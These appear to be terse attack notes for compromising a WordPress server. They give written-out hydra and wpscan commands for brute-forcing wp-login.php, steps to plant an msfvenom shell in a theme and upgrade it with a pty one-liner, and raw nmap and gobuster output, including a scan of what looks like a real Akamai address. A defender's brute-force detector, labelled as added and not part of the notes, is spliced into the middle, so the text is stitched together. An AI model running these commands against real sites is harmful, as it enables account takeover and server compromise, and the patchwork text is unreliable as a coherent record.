steps

  1. nmap
  2. gobuster: gobuster dir -u <ip> -w <wordlist> -t 100
  3. check robots.txt
  4. wpscan
  5. Burp Suite: login form

hydra (usernames): hydra -L <list of usernames> -p <test password> <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username" -t 20

hydra (password): hydra -l <username> -P <password file> <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you" -t 20

  1. or wpscan: wpscan --url <ip> -U <username> -P <password list> -t 20
  2. login
  3. msfvenom shell
  4. multi handler
  5. edit theme and insert shell
  6. upgrade shell: python -c 'import pty;pty.spawn("/bin/bash")'
  7. enumerate users' home directories
  8. crack
  9. switch user
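
Added example (not part of these notes): a defender's-side detector for the wp-login.php password guessing in the steps above, run over constructed Apache access-log lines. It assumes WordPress's default behaviour of answering a failed login with HTTP 200 and a successful one with a 302 to wp-admin; the log lines, IPs and thresholds are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"]))

def detect_wp_login_bruteforce(lines, threshold=10, window_s=60):
    """Flag client IPs with >= threshold failed wp-login.php POSTs inside window_s seconds.
    WordPress re-renders the form with HTTP 200 on a failed login and answers a successful
    login with a 302 to wp-admin, so a 302 after a burst of 200s is a possible successful guess."""
    events = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            events[ip].append((ts, status))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        failures = [ts for ts, st in evs if st == 200]
        # sliding window: any run of `threshold` failures spanning <= window_s seconds
        burst = any((failures[i + threshold - 1] - failures[i]).total_seconds() <= window_s
                    for i in range(len(failures) - threshold + 1))
        if burst:
            success_after = any(st == 302 and ts >= failures[0] for ts, st in evs)
            findings[ip] = {"failed_posts": len(failures), "possible_success": success_after}
    return findings

def _line(ip, sec, status):
    # Constructed sample line in Apache combined format (not taken from the original notes).
    return (f'{ip} - - [09/Nov/2023:10:00:{sec:02d} +0000] "POST /wp-login.php HTTP/1.1" '
            f'{status} 1234 "-" "Mozilla/5.0"')

# 12 failed guesses from one client in 12 seconds, then a 302; one normal login from another.
SAMPLE_LOG = ([_line("203.0.113.5", s, 200) for s in range(12)]
              + [_line("203.0.113.5", 13, 302), _line("198.51.100.7", 20, 302)])
```

Running `detect_wp_login_bruteforce(SAMPLE_LOG)` reports only 203.0.113.5, with the trailing 302 marked as a possible successful guess; the single legitimate login from 198.51.100.7 is not flagged.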
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 02:CD:BD:2D:91:E5 (Unknown)

208.185.115.6
PORT     STATE SERVICE      VERSION
80/tcp   open  http         AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
|_http-server-header: AkamaiGHost
|_http-title: Invalid URL
443/tcp  open  ssl/http     AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
|_http-server-header: AkamaiGHost
|_http-title: Invalid URL
| ssl-cert: Subject: commonName=a248.e.akamai.net/organizationName=Akamai Technologies, Inc./stateOrProvinceName=Massachusetts/countryName=US
| Subject Alternative Name: DNS:a248.e.akamai.net, DNS:*.akamaized.net, DNS:*.akamaized-staging.net, DNS:*.akamaihd.net, DNS:*.akamaihd-staging.net
| Not valid before: 2023-05-16T00:00:00
|_Not valid after:  2024-05-15T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|   http/1.1
|_  http/1.0
8883/tcp open  secure-mqtt?
|_mqtt-subscribe: ERROR

===============================================================
/images (Status: 301)
/blog (Status: 301)
/sitemap (Status: 200)
/rss (Status: 301)
/login (Status: 302)
/0 (Status: 301)
/video (Status: 301)
/feed (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/Image (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/robots (Status: 200)
/dashboard (Status: 302)
/%20 (Status: 301)
/wp-admin (Status: 301)
/0000 (Status: 301)
/phpmyadmin (Status: 403)
Last modified 2023.11.09